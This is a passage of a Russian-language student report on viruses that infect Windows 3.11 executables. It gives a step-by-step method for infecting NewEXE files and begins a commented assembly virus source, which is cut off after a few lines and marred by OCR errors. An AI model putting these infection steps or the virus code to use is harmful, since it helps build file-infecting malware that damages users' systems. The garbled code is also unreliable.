Информатика, программирование / Доклад: Вирусы под Windows

Доклад: Вирусы под Windows

В этой главе рассказано
о вирусах, заражающих фай-
лы в операционной среде
Windows. Наиболее подробно
рассмотрены вирусы под
Windows 95, Представлены
исходные тексты вирусов
с подробными комментариями,
Также приведены основные
сведения о запускаемых фай-
лах программ под Windows,
их структуре, отличиях
от файлов DOS,

Вирусы под Windows 3.11

В исполняемом файле Windows содержатся в различных комбинациях
код, данные и ресурсы. Ресурсы - это BIN-данные для прикладных про-
грамм. Учитывая возможность запуска файла из DOS, формат данных
должен распознаваться обеими системами - и DOS, и Windows.
Для этого все исполняемые файлы под Windows содержат два заголов-
ка. Первый заголовок (старый) - распознается DOS как программа, вы-
водящая на экран "This program requires Microsoft Windows". Второй
заголовок (NewEXE) - для работы в Windows (см. приложение).

Как же заразить Windows NewEXE? На первый взгляд файл формата
WinNE - обычный ЕХЕ-файл. Начинается он с заголовка ЕХЕ для
DOS и программы (STUB), которая выводит сообщение "This program
requires Microsoft Windows".

Если в ЕХЕ-заголовке по смещению 18h стоит число 40h или больше,
значит по смещению 3Ch находится смещение заголовка NewEXE.

Заголовок NewEXE начинается с символов "NE". Далее идет собствен-
но заголовок, в котором содержатся различные данные, в том числе ад-
реса смещений таблиц сегментов, ресурсов и другие. После заголовка
расположена таблица сегментов, за ней - все остальные таблицы, далее
размещены собственно сегменты с кодом.

Итак, порядок действий:

1. Адрес заголовка NewEXE (DOS_Header+3Ch) уменьшается на 8.

2. Заголовок NewEXE сдвигается на 8 байт назад.

3. В таблицу сегментов добавляется новый элемент, описывающий
сегмент вируса.

4. CS:IP NewEXE изменяется на начало вирусного кода, само тело
вируса дописывается в конец файла.

Для загрузки в память (надо перехватить вектор INT 21h из-под
Windows) необходимо использовать функции DPMI (INT 31h). Дей-
ствия: выделение сегмента, изменение его прав доступа, запись вируса,
перехват прерывания 21h (делается с помощью функций DPMI).

В качестве примера приведен полный исходный текст вируса под Windows.
Принципы заражения такие же, как и при заражении^обычного ЕХЕ-фай-
ла,- изменяется структура ЕХЕ-файла и среда, в которЬй он работает.

.286

.MODEL TINY
.CODE

;Сохраним регистры и флаги
pushf
pusha
push ds
push es

.Проверим, доступен ли DPMI. Если доступен,
Продолжаем, если нет - выходим

mov ax,1686h

int 2Fh

or ax, ax

jz dpmi_exist

;Восстановим регистры и флаги
exit:

pop es

pop ds

popa

popf

.Запустим программу-носитель

db OEAh
reloclP dw 0
relocCS dw OFFFFh
dpmi_exist:

;Выделим линейный блок памяти, используя DPMI
mov ax,0501h
mov cx,OFFFFh
xor bx.bx
int 31 h

--> ЧИТАТЬ ПОЛНОСТЬЮ <--

К-во Просмотров: 940
Бесплатно скачать Доклад: Вирусы под Windows